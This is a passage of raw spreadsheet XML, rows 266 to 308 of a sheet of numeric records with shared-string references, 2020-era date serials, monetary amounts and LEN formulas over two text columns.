      </c>
    </row>
    <row r="266" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A266">
        <v>20311</v>
      </c>
      <c r="B266">
        <v>2605</v>
      </c>
      <c r="C266" t="s">
        <v>5690</v>
      </c>
      <c r="D266" t="s">
        <v>10613</v>
      </c>
      <c r="E266">
        <v>11</v>
      </c>
      <c r="F266" t="s">
        <v>9437</v>
      </c>
      <c r="G266" s="1">
        <v>43949</v>
      </c>
      <c r="H266">
        <v>100000</v>
      </c>
      <c r="I266" t="s">
        <v>10031</v>
      </c>
      <c r="J266" t="s">
        <v>10618</v>
      </c>
      <c r="K266">
        <f>LEN(I266)</f>
        <v>100</v>
      </c>
      <c r="L266">
        <f>LEN(J266)</f>
        <v>65</v>
      </c>
    </row>
    <row r="267" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A267">
        <v>21030</v>
      </c>
      <c r="B267">
        <v>1353</v>
      </c>
      <c r="C267" t="s">
        <v>3081</v>
      </c>
      <c r="D267" t="s">
        <v>11107</v>
      </c>
      <c r="E267">
        <v>11</v>
      </c>
      <c r="F267" t="s">
        <v>1746</v>
      </c>
      <c r="G267" s="1">
        <v>44039</v>
      </c>
      <c r="H267">
        <v>100000</v>
      </c>
      <c r="J267" t="s">
        <v>10618</v>
      </c>
      <c r="K267">
        <f>LEN(I267)</f>
        <v>0</v>
      </c>
      <c r="L267">
        <f>LEN(J267)</f>
        <v>65</v>
      </c>
    </row>
    <row r="268" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A268">
        <v>21031</v>
      </c>
      <c r="B268">
        <v>1353</v>
      </c>
      <c r="C268" t="s">
        <v>3081</v>
      </c>
      <c r="D268" t="s">
        <v>11107</v>
      </c>
      <c r="E268">
        <v>11</v>
      </c>
      <c r="F268" t="s">
        <v>10127</v>
      </c>
      <c r="G268" s="1">
        <v>44039</v>
      </c>
      <c r="H268">
        <v>25000</v>
      </c>
      <c r="J268" t="s">
        <v>10618</v>
      </c>
      <c r="K268">
        <f>LEN(I268)</f>
        <v>0</v>
      </c>
      <c r="L268">
        <f>LEN(J268)</f>
        <v>65</v>
      </c>
    </row>
    <row r="269" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A269">
        <v>21032</v>
      </c>
      <c r="B269">
        <v>1353</v>
      </c>
      <c r="C269" t="s">
        <v>3081</v>
      </c>
      <c r="D269" t="s">
        <v>11107</v>
      </c>
      <c r="E269">
        <v>11</v>
      </c>
      <c r="F269" t="s">
        <v>11108</v>
      </c>
      <c r="G269" s="1">
        <v>44039</v>
      </c>
      <c r="H269">
        <v>25000</v>
      </c>
      <c r="J269" t="s">
        <v>10618</v>
      </c>
      <c r="K269">
        <f>LEN(I269)</f>
        <v>0</v>
      </c>
      <c r="L269">
        <f>LEN(J269)</f>
        <v>65</v>
      </c>
    </row>
    <row r="270" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A270">
        <v>21033</v>
      </c>
      <c r="B270">
        <v>1353</v>
      </c>
      <c r="C270" t="s">
        <v>3081</v>
      </c>
      <c r="D270" t="s">
        <v>11107</v>
      </c>
      <c r="E270">
        <v>11</v>
      </c>
      <c r="F270" t="s">
        <v>11109</v>
      </c>
      <c r="G270" s="1">
        <v>44039</v>
      </c>
      <c r="H270">
        <v>25000</v>
      </c>
      <c r="J270" t="s">
        <v>10618</v>
      </c>
      <c r="K270">
        <f>LEN(I270)</f>
        <v>0</v>
      </c>
      <c r="L270">
        <f>LEN(J270)</f>
        <v>65</v>
      </c>
    </row>
    <row r="271" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A271">
        <v>21034</v>
      </c>
      <c r="B271">
        <v>1353</v>
      </c>
      <c r="C271" t="s">
        <v>3081</v>
      </c>
      <c r="D271" t="s">
        <v>11107</v>
      </c>
      <c r="E271">
        <v>11</v>
      </c>
      <c r="F271" t="s">
        <v>9941</v>
      </c>
      <c r="G271" s="1">
        <v>44039</v>
      </c>
      <c r="H271">
        <v>10000</v>
      </c>
      <c r="J271" t="s">
        <v>10618</v>
      </c>
      <c r="K271">
        <f>LEN(I271)</f>
        <v>0</v>
      </c>
      <c r="L271">
        <f>LEN(J271)</f>
        <v>65</v>
      </c>
    </row>
    <row r="272" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A272">
        <v>21035</v>
      </c>
      <c r="B272">
        <v>1353</v>
      </c>
      <c r="C272" t="s">
        <v>3081</v>
      </c>
      <c r="D272" t="s">
        <v>11107</v>
      </c>
      <c r="E272">
        <v>11</v>
      </c>
      <c r="F272" t="s">
        <v>9849</v>
      </c>
      <c r="G272" s="1">
        <v>44039</v>
      </c>
      <c r="H272">
        <v>10000</v>
      </c>
      <c r="J272" t="s">
        <v>10618</v>
      </c>
      <c r="K272">
        <f>LEN(I272)</f>
        <v>0</v>
      </c>
      <c r="L272">
        <f>LEN(J272)</f>
        <v>65</v>
      </c>
    </row>
    <row r="273" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A273">
        <v>21036</v>
      </c>
      <c r="B273">
        <v>1353</v>
      </c>
      <c r="C273" t="s">
        <v>3081</v>
      </c>
      <c r="D273" t="s">
        <v>11107</v>
      </c>
      <c r="E273">
        <v>11</v>
      </c>
      <c r="F273" t="s">
        <v>11110</v>
      </c>
      <c r="G273" s="1">
        <v>44039</v>
      </c>
      <c r="H273">
        <v>10000</v>
      </c>
      <c r="J273" t="s">
        <v>10618</v>
      </c>
      <c r="K273">
        <f>LEN(I273)</f>
        <v>0</v>
      </c>
      <c r="L273">
        <f>LEN(J273)</f>
        <v>65</v>
      </c>
    </row>
    <row r="274" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A274">
        <v>20124</v>
      </c>
      <c r="B274">
        <v>2615</v>
      </c>
      <c r="C274" t="s">
        <v>5527</v>
      </c>
      <c r="D274" t="s">
        <v>10464</v>
      </c>
      <c r="E274">
        <v>18</v>
      </c>
      <c r="F274" t="s">
        <v>10487</v>
      </c>
      <c r="G274" s="1">
        <v>43937</v>
      </c>
      <c r="H274">
        <v>90000</v>
      </c>
      <c r="I274" t="s">
        <v>10488</v>
      </c>
      <c r="J274" t="s">
        <v>9551</v>
      </c>
      <c r="K274">
        <f>LEN(I274)</f>
        <v>151</v>
      </c>
      <c r="L274">
        <f>LEN(J274)</f>
        <v>64</v>
      </c>
    </row>
    <row r="275" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A275">
        <v>20125</v>
      </c>
      <c r="B275">
        <v>2615</v>
      </c>
      <c r="C275" t="s">
        <v>5527</v>
      </c>
      <c r="D275" t="s">
        <v>10464</v>
      </c>
      <c r="E275">
        <v>18</v>
      </c>
      <c r="F275" t="s">
        <v>10489</v>
      </c>
      <c r="G275" s="1">
        <v>43937</v>
      </c>
      <c r="H275">
        <v>90000</v>
      </c>
      <c r="I275" t="s">
        <v>10490</v>
      </c>
      <c r="J275" t="s">
        <v>9551</v>
      </c>
      <c r="K275">
        <f>LEN(I275)</f>
        <v>91</v>
      </c>
      <c r="L275">
        <f>LEN(J275)</f>
        <v>64</v>
      </c>
    </row>
    <row r="276" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A276">
        <v>20151</v>
      </c>
      <c r="B276">
        <v>2615</v>
      </c>
      <c r="C276" t="s">
        <v>5527</v>
      </c>
      <c r="D276" t="s">
        <v>10464</v>
      </c>
      <c r="E276">
        <v>18</v>
      </c>
      <c r="F276" t="s">
        <v>10509</v>
      </c>
      <c r="G276" s="1">
        <v>43937</v>
      </c>
      <c r="H276">
        <v>10000</v>
      </c>
      <c r="I276" t="s">
        <v>10510</v>
      </c>
      <c r="J276" t="s">
        <v>9551</v>
      </c>
      <c r="K276">
        <f>LEN(I276)</f>
        <v>82</v>
      </c>
      <c r="L276">
        <f>LEN(J276)</f>
        <v>64</v>
      </c>
    </row>
    <row r="277" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A277">
        <v>20097</v>
      </c>
      <c r="B277">
        <v>2615</v>
      </c>
      <c r="C277" t="s">
        <v>5527</v>
      </c>
      <c r="D277" t="s">
        <v>10464</v>
      </c>
      <c r="E277">
        <v>18</v>
      </c>
      <c r="F277" t="s">
        <v>9466</v>
      </c>
      <c r="G277" s="1">
        <v>43944</v>
      </c>
      <c r="H277">
        <v>1000</v>
      </c>
      <c r="I277" t="s">
        <v>10467</v>
      </c>
      <c r="J277" t="s">
        <v>9551</v>
      </c>
      <c r="K277">
        <f>LEN(I277)</f>
        <v>67</v>
      </c>
      <c r="L277">
        <f>LEN(J277)</f>
        <v>64</v>
      </c>
    </row>
    <row r="278" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A278">
        <v>20098</v>
      </c>
      <c r="B278">
        <v>2615</v>
      </c>
      <c r="C278" t="s">
        <v>5527</v>
      </c>
      <c r="D278" t="s">
        <v>10464</v>
      </c>
      <c r="E278">
        <v>18</v>
      </c>
      <c r="F278" t="s">
        <v>9577</v>
      </c>
      <c r="G278" s="1">
        <v>43944</v>
      </c>
      <c r="H278">
        <v>1000</v>
      </c>
      <c r="I278" t="s">
        <v>10468</v>
      </c>
      <c r="J278" t="s">
        <v>9551</v>
      </c>
      <c r="K278">
        <f>LEN(I278)</f>
        <v>62</v>
      </c>
      <c r="L278">
        <f>LEN(J278)</f>
        <v>64</v>
      </c>
    </row>
    <row r="279" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A279">
        <v>16887</v>
      </c>
      <c r="B279">
        <v>1381</v>
      </c>
      <c r="C279" t="s">
        <v>2504</v>
      </c>
      <c r="D279" t="s">
        <v>9549</v>
      </c>
      <c r="E279">
        <v>11</v>
      </c>
      <c r="F279" t="s">
        <v>9217</v>
      </c>
      <c r="G279" s="1">
        <v>43913</v>
      </c>
      <c r="H279">
        <v>1000</v>
      </c>
      <c r="I279" t="s">
        <v>9550</v>
      </c>
      <c r="J279" t="s">
        <v>9551</v>
      </c>
      <c r="K279">
        <f>LEN(I279)</f>
        <v>18</v>
      </c>
      <c r="L279">
        <f>LEN(J279)</f>
        <v>64</v>
      </c>
    </row>
    <row r="280" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A280">
        <v>16888</v>
      </c>
      <c r="B280">
        <v>1381</v>
      </c>
      <c r="C280" t="s">
        <v>2504</v>
      </c>
      <c r="D280" t="s">
        <v>9549</v>
      </c>
      <c r="E280">
        <v>11</v>
      </c>
      <c r="F280" t="s">
        <v>9552</v>
      </c>
      <c r="G280" s="1">
        <v>43913</v>
      </c>
      <c r="H280">
        <v>800</v>
      </c>
      <c r="I280" t="s">
        <v>9550</v>
      </c>
      <c r="J280" t="s">
        <v>9551</v>
      </c>
      <c r="K280">
        <f>LEN(I280)</f>
        <v>18</v>
      </c>
      <c r="L280">
        <f>LEN(J280)</f>
        <v>64</v>
      </c>
    </row>
    <row r="281" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A281">
        <v>16893</v>
      </c>
      <c r="B281">
        <v>1381</v>
      </c>
      <c r="C281" t="s">
        <v>2504</v>
      </c>
      <c r="D281" t="s">
        <v>9549</v>
      </c>
      <c r="E281">
        <v>11</v>
      </c>
      <c r="F281" t="s">
        <v>9556</v>
      </c>
      <c r="G281" s="1">
        <v>43913</v>
      </c>
      <c r="H281">
        <v>1000</v>
      </c>
      <c r="I281" t="s">
        <v>9550</v>
      </c>
      <c r="J281" t="s">
        <v>9551</v>
      </c>
      <c r="K281">
        <f>LEN(I281)</f>
        <v>18</v>
      </c>
      <c r="L281">
        <f>LEN(J281)</f>
        <v>64</v>
      </c>
    </row>
    <row r="282" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A282">
        <v>16894</v>
      </c>
      <c r="B282">
        <v>1381</v>
      </c>
      <c r="C282" t="s">
        <v>2504</v>
      </c>
      <c r="D282" t="s">
        <v>9549</v>
      </c>
      <c r="E282">
        <v>11</v>
      </c>
      <c r="F282" t="s">
        <v>9454</v>
      </c>
      <c r="G282" s="1">
        <v>43913</v>
      </c>
      <c r="H282">
        <v>800</v>
      </c>
      <c r="I282" t="s">
        <v>9550</v>
      </c>
      <c r="J282" t="s">
        <v>9551</v>
      </c>
      <c r="K282">
        <f>LEN(I282)</f>
        <v>18</v>
      </c>
      <c r="L282">
        <f>LEN(J282)</f>
        <v>64</v>
      </c>
    </row>
    <row r="283" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A283">
        <v>21317</v>
      </c>
      <c r="B283">
        <v>1381</v>
      </c>
      <c r="C283" t="s">
        <v>2504</v>
      </c>
      <c r="D283" t="s">
        <v>9549</v>
      </c>
      <c r="E283">
        <v>11</v>
      </c>
      <c r="F283" t="s">
        <v>9675</v>
      </c>
      <c r="G283" s="1">
        <v>44014</v>
      </c>
      <c r="H283">
        <v>500</v>
      </c>
      <c r="I283" t="s">
        <v>11301</v>
      </c>
      <c r="J283" t="s">
        <v>9551</v>
      </c>
      <c r="K283">
        <f>LEN(I283)</f>
        <v>18</v>
      </c>
      <c r="L283">
        <f>LEN(J283)</f>
        <v>64</v>
      </c>
    </row>
    <row r="284" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A284">
        <v>21318</v>
      </c>
      <c r="B284">
        <v>1381</v>
      </c>
      <c r="C284" t="s">
        <v>2504</v>
      </c>
      <c r="D284" t="s">
        <v>9549</v>
      </c>
      <c r="E284">
        <v>11</v>
      </c>
      <c r="F284" t="s">
        <v>9928</v>
      </c>
      <c r="G284" s="1">
        <v>44014</v>
      </c>
      <c r="H284">
        <v>500</v>
      </c>
      <c r="I284" t="s">
        <v>9550</v>
      </c>
      <c r="J284" t="s">
        <v>9551</v>
      </c>
      <c r="K284">
        <f>LEN(I284)</f>
        <v>18</v>
      </c>
      <c r="L284">
        <f>LEN(J284)</f>
        <v>64</v>
      </c>
    </row>
    <row r="285" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A285">
        <v>21319</v>
      </c>
      <c r="B285">
        <v>1381</v>
      </c>
      <c r="C285" t="s">
        <v>2504</v>
      </c>
      <c r="D285" t="s">
        <v>9549</v>
      </c>
      <c r="E285">
        <v>11</v>
      </c>
      <c r="F285" t="s">
        <v>9640</v>
      </c>
      <c r="G285" s="1">
        <v>44014</v>
      </c>
      <c r="H285">
        <v>500</v>
      </c>
      <c r="I285" t="s">
        <v>9550</v>
      </c>
      <c r="J285" t="s">
        <v>9551</v>
      </c>
      <c r="K285">
        <f>LEN(I285)</f>
        <v>18</v>
      </c>
      <c r="L285">
        <f>LEN(J285)</f>
        <v>64</v>
      </c>
    </row>
    <row r="286" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A286">
        <v>20375</v>
      </c>
      <c r="B286">
        <v>1248</v>
      </c>
      <c r="C286" t="s">
        <v>2951</v>
      </c>
      <c r="D286" t="s">
        <v>10666</v>
      </c>
      <c r="E286">
        <v>11</v>
      </c>
      <c r="F286" t="s">
        <v>547</v>
      </c>
      <c r="G286" s="1">
        <v>44298</v>
      </c>
      <c r="H286">
        <v>1500</v>
      </c>
      <c r="J286" t="s">
        <v>9551</v>
      </c>
      <c r="K286">
        <f>LEN(I286)</f>
        <v>0</v>
      </c>
      <c r="L286">
        <f>LEN(J286)</f>
        <v>64</v>
      </c>
    </row>
    <row r="287" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A287">
        <v>20376</v>
      </c>
      <c r="B287">
        <v>1248</v>
      </c>
      <c r="C287" t="s">
        <v>2951</v>
      </c>
      <c r="D287" t="s">
        <v>10666</v>
      </c>
      <c r="E287">
        <v>11</v>
      </c>
      <c r="F287" t="s">
        <v>10667</v>
      </c>
      <c r="G287" s="1">
        <v>44298</v>
      </c>
      <c r="H287">
        <v>1000</v>
      </c>
      <c r="J287" t="s">
        <v>9551</v>
      </c>
      <c r="K287">
        <f>LEN(I287)</f>
        <v>0</v>
      </c>
      <c r="L287">
        <f>LEN(J287)</f>
        <v>64</v>
      </c>
    </row>
    <row r="288" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A288">
        <v>20378</v>
      </c>
      <c r="B288">
        <v>1248</v>
      </c>
      <c r="C288" t="s">
        <v>2951</v>
      </c>
      <c r="D288" t="s">
        <v>10666</v>
      </c>
      <c r="E288">
        <v>11</v>
      </c>
      <c r="F288" t="s">
        <v>9453</v>
      </c>
      <c r="G288" s="1">
        <v>44298</v>
      </c>
      <c r="H288">
        <v>1000</v>
      </c>
      <c r="J288" t="s">
        <v>9551</v>
      </c>
      <c r="K288">
        <f>LEN(I288)</f>
        <v>0</v>
      </c>
      <c r="L288">
        <f>LEN(J288)</f>
        <v>64</v>
      </c>
    </row>
    <row r="289" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A289">
        <v>21001</v>
      </c>
      <c r="B289">
        <v>1381</v>
      </c>
      <c r="C289" t="s">
        <v>2504</v>
      </c>
      <c r="D289" t="s">
        <v>9549</v>
      </c>
      <c r="E289">
        <v>11</v>
      </c>
      <c r="F289" t="s">
        <v>547</v>
      </c>
      <c r="G289" s="1">
        <v>44014</v>
      </c>
      <c r="H289">
        <v>500</v>
      </c>
      <c r="J289" t="s">
        <v>9551</v>
      </c>
      <c r="K289">
        <f>LEN(I289)</f>
        <v>0</v>
      </c>
      <c r="L289">
        <f>LEN(J289)</f>
        <v>64</v>
      </c>
    </row>
    <row r="290" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A290">
        <v>21009</v>
      </c>
      <c r="B290">
        <v>1381</v>
      </c>
      <c r="C290" t="s">
        <v>2504</v>
      </c>
      <c r="D290" t="s">
        <v>9549</v>
      </c>
      <c r="E290">
        <v>11</v>
      </c>
      <c r="F290" t="s">
        <v>9577</v>
      </c>
      <c r="G290" s="1">
        <v>44014</v>
      </c>
      <c r="H290">
        <v>500</v>
      </c>
      <c r="J290" t="s">
        <v>9551</v>
      </c>
      <c r="K290">
        <f>LEN(I290)</f>
        <v>0</v>
      </c>
      <c r="L290">
        <f>LEN(J290)</f>
        <v>64</v>
      </c>
    </row>
    <row r="291" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A291">
        <v>21010</v>
      </c>
      <c r="B291">
        <v>1381</v>
      </c>
      <c r="C291" t="s">
        <v>2504</v>
      </c>
      <c r="D291" t="s">
        <v>9549</v>
      </c>
      <c r="E291">
        <v>11</v>
      </c>
      <c r="F291" t="s">
        <v>11098</v>
      </c>
      <c r="G291" s="1">
        <v>44014</v>
      </c>
      <c r="H291">
        <v>500</v>
      </c>
      <c r="J291" t="s">
        <v>9551</v>
      </c>
      <c r="K291">
        <f>LEN(I291)</f>
        <v>0</v>
      </c>
      <c r="L291">
        <f>LEN(J291)</f>
        <v>64</v>
      </c>
    </row>
    <row r="292" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A292">
        <v>21024</v>
      </c>
      <c r="B292">
        <v>1381</v>
      </c>
      <c r="C292" t="s">
        <v>2504</v>
      </c>
      <c r="D292" t="s">
        <v>9549</v>
      </c>
      <c r="E292">
        <v>11</v>
      </c>
      <c r="F292" t="s">
        <v>10667</v>
      </c>
      <c r="G292" s="1">
        <v>44014</v>
      </c>
      <c r="H292">
        <v>500</v>
      </c>
      <c r="J292" t="s">
        <v>9551</v>
      </c>
      <c r="K292">
        <f>LEN(I292)</f>
        <v>0</v>
      </c>
      <c r="L292">
        <f>LEN(J292)</f>
        <v>64</v>
      </c>
    </row>
    <row r="293" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A293">
        <v>21151</v>
      </c>
      <c r="B293">
        <v>2719</v>
      </c>
      <c r="C293" t="s">
        <v>6860</v>
      </c>
      <c r="D293" t="s">
        <v>10823</v>
      </c>
      <c r="E293">
        <v>13</v>
      </c>
      <c r="F293" t="s">
        <v>9595</v>
      </c>
      <c r="G293" s="1">
        <v>44007</v>
      </c>
      <c r="H293">
        <v>604736</v>
      </c>
      <c r="J293" t="s">
        <v>11175</v>
      </c>
      <c r="K293">
        <f>LEN(I293)</f>
        <v>0</v>
      </c>
      <c r="L293">
        <f>LEN(J293)</f>
        <v>64</v>
      </c>
    </row>
    <row r="294" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A294">
        <v>21337</v>
      </c>
      <c r="B294">
        <v>1117</v>
      </c>
      <c r="C294" t="s">
        <v>3156</v>
      </c>
      <c r="D294" t="s">
        <v>11320</v>
      </c>
      <c r="E294">
        <v>16</v>
      </c>
      <c r="F294" t="s">
        <v>9523</v>
      </c>
      <c r="G294" s="1">
        <v>44090</v>
      </c>
      <c r="H294">
        <v>500</v>
      </c>
      <c r="J294" t="s">
        <v>9551</v>
      </c>
      <c r="K294">
        <f>LEN(I294)</f>
        <v>0</v>
      </c>
      <c r="L294">
        <f>LEN(J294)</f>
        <v>64</v>
      </c>
    </row>
    <row r="295" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A295">
        <v>21338</v>
      </c>
      <c r="B295">
        <v>1117</v>
      </c>
      <c r="C295" t="s">
        <v>3156</v>
      </c>
      <c r="D295" t="s">
        <v>11320</v>
      </c>
      <c r="E295">
        <v>16</v>
      </c>
      <c r="F295" t="s">
        <v>9722</v>
      </c>
      <c r="G295" s="1">
        <v>44090</v>
      </c>
      <c r="H295">
        <v>500</v>
      </c>
      <c r="J295" t="s">
        <v>9551</v>
      </c>
      <c r="K295">
        <f>LEN(I295)</f>
        <v>0</v>
      </c>
      <c r="L295">
        <f>LEN(J295)</f>
        <v>64</v>
      </c>
    </row>
    <row r="296" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A296">
        <v>21339</v>
      </c>
      <c r="B296">
        <v>1117</v>
      </c>
      <c r="C296" t="s">
        <v>3156</v>
      </c>
      <c r="D296" t="s">
        <v>11320</v>
      </c>
      <c r="E296">
        <v>16</v>
      </c>
      <c r="F296" t="s">
        <v>1746</v>
      </c>
      <c r="G296" s="1">
        <v>44090</v>
      </c>
      <c r="H296">
        <v>500</v>
      </c>
      <c r="J296" t="s">
        <v>9551</v>
      </c>
      <c r="K296">
        <f>LEN(I296)</f>
        <v>0</v>
      </c>
      <c r="L296">
        <f>LEN(J296)</f>
        <v>64</v>
      </c>
    </row>
    <row r="297" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A297">
        <v>21340</v>
      </c>
      <c r="B297">
        <v>1117</v>
      </c>
      <c r="C297" t="s">
        <v>3156</v>
      </c>
      <c r="D297" t="s">
        <v>11320</v>
      </c>
      <c r="E297">
        <v>16</v>
      </c>
      <c r="F297" t="s">
        <v>9675</v>
      </c>
      <c r="G297" s="1">
        <v>44090</v>
      </c>
      <c r="H297">
        <v>500</v>
      </c>
      <c r="J297" t="s">
        <v>9551</v>
      </c>
      <c r="K297">
        <f>LEN(I297)</f>
        <v>0</v>
      </c>
      <c r="L297">
        <f>LEN(J297)</f>
        <v>64</v>
      </c>
    </row>
    <row r="298" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A298">
        <v>21341</v>
      </c>
      <c r="B298">
        <v>1117</v>
      </c>
      <c r="C298" t="s">
        <v>3156</v>
      </c>
      <c r="D298" t="s">
        <v>11320</v>
      </c>
      <c r="E298">
        <v>16</v>
      </c>
      <c r="F298" t="s">
        <v>9640</v>
      </c>
      <c r="G298" s="1">
        <v>44090</v>
      </c>
      <c r="H298">
        <v>500</v>
      </c>
      <c r="J298" t="s">
        <v>9551</v>
      </c>
      <c r="K298">
        <f>LEN(I298)</f>
        <v>0</v>
      </c>
      <c r="L298">
        <f>LEN(J298)</f>
        <v>64</v>
      </c>
    </row>
    <row r="299" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A299">
        <v>21342</v>
      </c>
      <c r="B299">
        <v>1117</v>
      </c>
      <c r="C299" t="s">
        <v>3156</v>
      </c>
      <c r="D299" t="s">
        <v>11320</v>
      </c>
      <c r="E299">
        <v>16</v>
      </c>
      <c r="F299" t="s">
        <v>9928</v>
      </c>
      <c r="G299" s="1">
        <v>44090</v>
      </c>
      <c r="H299">
        <v>500</v>
      </c>
      <c r="J299" t="s">
        <v>9551</v>
      </c>
      <c r="K299">
        <f>LEN(I299)</f>
        <v>0</v>
      </c>
      <c r="L299">
        <f>LEN(J299)</f>
        <v>64</v>
      </c>
    </row>
    <row r="300" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A300">
        <v>21343</v>
      </c>
      <c r="B300">
        <v>1117</v>
      </c>
      <c r="C300" t="s">
        <v>3156</v>
      </c>
      <c r="D300" t="s">
        <v>11320</v>
      </c>
      <c r="E300">
        <v>16</v>
      </c>
      <c r="F300" t="s">
        <v>11321</v>
      </c>
      <c r="G300" s="1">
        <v>44090</v>
      </c>
      <c r="H300">
        <v>500</v>
      </c>
      <c r="J300" t="s">
        <v>9551</v>
      </c>
      <c r="K300">
        <f>LEN(I300)</f>
        <v>0</v>
      </c>
      <c r="L300">
        <f>LEN(J300)</f>
        <v>64</v>
      </c>
    </row>
    <row r="301" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A301">
        <v>21344</v>
      </c>
      <c r="B301">
        <v>1117</v>
      </c>
      <c r="C301" t="s">
        <v>3156</v>
      </c>
      <c r="D301" t="s">
        <v>11320</v>
      </c>
      <c r="E301">
        <v>16</v>
      </c>
      <c r="F301" t="s">
        <v>10463</v>
      </c>
      <c r="G301" s="1">
        <v>44090</v>
      </c>
      <c r="H301">
        <v>500</v>
      </c>
      <c r="J301" t="s">
        <v>9551</v>
      </c>
      <c r="K301">
        <f>LEN(I301)</f>
        <v>0</v>
      </c>
      <c r="L301">
        <f>LEN(J301)</f>
        <v>64</v>
      </c>
    </row>
    <row r="302" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A302">
        <v>21345</v>
      </c>
      <c r="B302">
        <v>1117</v>
      </c>
      <c r="C302" t="s">
        <v>3156</v>
      </c>
      <c r="D302" t="s">
        <v>11320</v>
      </c>
      <c r="E302">
        <v>16</v>
      </c>
      <c r="F302" t="s">
        <v>9595</v>
      </c>
      <c r="G302" s="1">
        <v>44090</v>
      </c>
      <c r="H302">
        <v>500</v>
      </c>
      <c r="J302" t="s">
        <v>9551</v>
      </c>
      <c r="K302">
        <f>LEN(I302)</f>
        <v>0</v>
      </c>
      <c r="L302">
        <f>LEN(J302)</f>
        <v>64</v>
      </c>
    </row>
    <row r="303" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A303">
        <v>21314</v>
      </c>
      <c r="B303">
        <v>241</v>
      </c>
      <c r="C303" t="s">
        <v>1604</v>
      </c>
      <c r="D303" t="s">
        <v>11287</v>
      </c>
      <c r="E303">
        <v>16</v>
      </c>
      <c r="F303" t="s">
        <v>11297</v>
      </c>
      <c r="G303" s="1">
        <v>44061</v>
      </c>
      <c r="H303">
        <v>413164.7</v>
      </c>
      <c r="I303" t="s">
        <v>11298</v>
      </c>
      <c r="J303" t="s">
        <v>11299</v>
      </c>
      <c r="K303">
        <f>LEN(I303)</f>
        <v>98</v>
      </c>
      <c r="L303">
        <f>LEN(J303)</f>
        <v>63</v>
      </c>
    </row>
    <row r="304" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A304">
        <v>17674</v>
      </c>
      <c r="B304">
        <v>500</v>
      </c>
      <c r="C304" t="s">
        <v>625</v>
      </c>
      <c r="D304" t="s">
        <v>9803</v>
      </c>
      <c r="E304">
        <v>11</v>
      </c>
      <c r="F304" t="s">
        <v>9804</v>
      </c>
      <c r="G304" s="1">
        <v>43942</v>
      </c>
      <c r="H304">
        <v>20000</v>
      </c>
      <c r="J304" t="s">
        <v>9805</v>
      </c>
      <c r="K304">
        <f>LEN(I304)</f>
        <v>0</v>
      </c>
      <c r="L304">
        <f>LEN(J304)</f>
        <v>63</v>
      </c>
    </row>
    <row r="305" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A305">
        <v>17675</v>
      </c>
      <c r="B305">
        <v>500</v>
      </c>
      <c r="C305" t="s">
        <v>625</v>
      </c>
      <c r="D305" t="s">
        <v>9803</v>
      </c>
      <c r="E305">
        <v>11</v>
      </c>
      <c r="F305" t="s">
        <v>9806</v>
      </c>
      <c r="G305" s="1">
        <v>43942</v>
      </c>
      <c r="H305">
        <v>20000</v>
      </c>
      <c r="J305" t="s">
        <v>9805</v>
      </c>
      <c r="K305">
        <f>LEN(I305)</f>
        <v>0</v>
      </c>
      <c r="L305">
        <f>LEN(J305)</f>
        <v>63</v>
      </c>
    </row>
    <row r="306" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A306">
        <v>17677</v>
      </c>
      <c r="B306">
        <v>500</v>
      </c>
      <c r="C306" t="s">
        <v>625</v>
      </c>
      <c r="D306" t="s">
        <v>9803</v>
      </c>
      <c r="E306">
        <v>11</v>
      </c>
      <c r="F306" t="s">
        <v>9437</v>
      </c>
      <c r="G306" s="1">
        <v>43942</v>
      </c>
      <c r="H306">
        <v>15000</v>
      </c>
      <c r="J306" t="s">
        <v>9805</v>
      </c>
      <c r="K306">
        <f>LEN(I306)</f>
        <v>0</v>
      </c>
      <c r="L306">
        <f>LEN(J306)</f>
        <v>63</v>
      </c>
    </row>
    <row r="307" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A307">
        <v>20381</v>
      </c>
      <c r="B307">
        <v>2579</v>
      </c>
      <c r="C307" t="s">
        <v>16297</v>
      </c>
      <c r="D307" t="s">
        <v>16298</v>
      </c>
      <c r="E307">
        <v>12</v>
      </c>
      <c r="F307" t="s">
        <v>10673</v>
      </c>
      <c r="G307" s="1">
        <v>43902</v>
      </c>
      <c r="H307" s="4">
        <v>10000</v>
      </c>
      <c r="J307" t="s">
        <v>10674</v>
      </c>
      <c r="K307">
        <f>LEN(I307)</f>
        <v>0</v>
      </c>
      <c r="L307">
        <f>LEN(J307)</f>
        <v>63</v>
      </c>
    </row>
    <row r="308" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A308">
        <v>20811</v>
      </c>
      <c r="B308">
        <v>841</v>
      </c>
